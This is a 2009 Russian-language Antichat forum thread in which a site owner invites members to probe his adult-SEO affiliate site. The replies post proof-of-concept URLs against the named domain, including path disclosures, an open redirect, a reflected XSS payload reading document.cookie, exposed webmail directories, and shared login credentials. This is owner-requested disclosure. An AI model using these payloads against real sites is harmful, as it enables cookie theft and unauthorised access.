ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

30.01.2009, 02:46
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме: 3941248
Репутация:
668
|
|
adultseo.ru
adultseo.ru Проверьте плиз сайт на уязвимости ...
партнёрк писал с 0 .... платник для неё
sexmalishki.ru
+5 тому кто хоть чтото найдёт =)
|
|
|

30.01.2009, 10:12
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме: 4512757
Репутация:
973
|
|
зарегестрируйтесь - очипятка, должно быть "зарегистрируйтесь" 
плюс в форме ввода немного уменьши длину поля для пароля, ато получается что Password на одной строчке, а : на другой 
Переныкай админку, ато http://adultseo.ru/admin/ это как-то банально 
Последний раз редактировалось login999; 30.01.2009 в 10:15..
|
|
|

30.01.2009, 10:19
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме: 2140897
Репутация:
267
|
|
Раскрытие путей
Код:
http://adultseo.ru/index.php?p[]=1
Код:
http://adultseo.ru/index.php?act=stat&site[]=
Последний раз редактировалось Shadow_p1raT; 30.01.2009 в 10:45..
|
|
|

30.01.2009, 10:23
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме: 4512757
Репутация:
973
|
|
http://adultseo.ru/redir.php?text=%5C%5C'%D0%E5%E3%E8%F1%F2%F0%E0%F6% E8%FF+%EE%EA%EE%ED%F7%E5%ED%E0%21&to=index.php
При переходе видно, что включено экранирование кавычек слешами  Кто шарит, может расковыряет 
P.S. Для тех, кому лень регистрироваться логин: antichat, пароль antichat 
Последний раз редактировалось login999; 30.01.2009 в 10:28..
|
|
|

30.01.2009, 11:45
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме: 812087
Репутация:
129
|
|
http://adultseo.ru/index.php?act=stat&country[]=
http://adultseo.ru/redir.php?text=%C2%FB+%E2%EE%F8%EB%E8+%E2+%F1%E8%F 1%F2%E5%EC%F3%21&to[]=
- раскрытие путей
http://adultseo.ru/redir.php?text=%DF%20%E2%E7%EB%EE%EC%E0%EB%20%FD%F 2%EE%F2%20%F1%E0%E9%F2%20:-D&to[]=
Только что бы побаловаться 
Последний раз редактировалось [NiGHT]DarkAngel; 30.01.2009 в 12:23..
|
|
|

30.01.2009, 13:39
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
http://adultseo.ru/redir.php?text[]=%5C%5C%27%D0%E5%E3%E8%F1%F2%F0%E0%F6%%20E8%FF+%EE %EA%EE%ED%F7%E5%ED%E0%21&to=index.php
|
|
|

30.01.2009, 13:48
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
ошибка на странице ссылки
там где реф ссылка у тебе ?act=reg
а должно быть ?page
|
|
|

30.01.2009, 14:00
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме: 3941248
Репутация:
668
|
|
login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars
зы всем спасибо исправил .. а посерьёзней ничего нет?
|
|
|

30.01.2009, 17:03
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме: 4512757
Репутация:
973
|
|
Сообщение от Doom123
login999 ммм а что там ковырять? .... нах те кавычка если там нет обращения к БД? а xss не выйдет т.к стоит htmlspecialchars
зы всем спасибо исправил .. а посерьёзней ничего нет?
Кавычку сую тупо по привычке везде :)
А вот насчет той ссылочки, то смотри на вот такой прикол :
http://adultseo.ru/redir.php?text=%C0%20%F2%E5%EF%E5%F0%FC%20%EC%FB%2 0%E2%E0%F1%20%EE%F2%EF%F0%E0%E2%E8%EC%20%ED%E0%20% E8%F4%F0%E5%E9%EC,%20%E0%20%EC%EE%E6%E5%F2%20%E8%2 0%ED%E0%20%F4%E5%E9%EA,%20%FF%20%F2%EE%F7%ED%EE%20 %F5%E7;)&to=http://forum.devisible.ru
а потом подумай хорошенько :)
Последний раз редактировалось login999; 30.01.2009 в 17:34..
|
|
|

30.01.2009, 19:55
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме: 236651
Репутация:
92
|
|
Пассивная ХСС
http://adultseo.ru/webmail/index.php?lid=bg&f_email=%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E
открыты директории..
webmail/inc/
webmail/docs/
раскрытие путей
http://adultseo.ru/webmail/inc/inc.php
http://adultseo.ru/webmail/inc/class.uebimiau.php
http://adultseo.ru/webmail/inc/class.uebimiau_mail.php
http://adultseo.ru/webmail/inc/config.php
Последний раз редактировалось Maestus; 30.01.2009 в 19:59..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|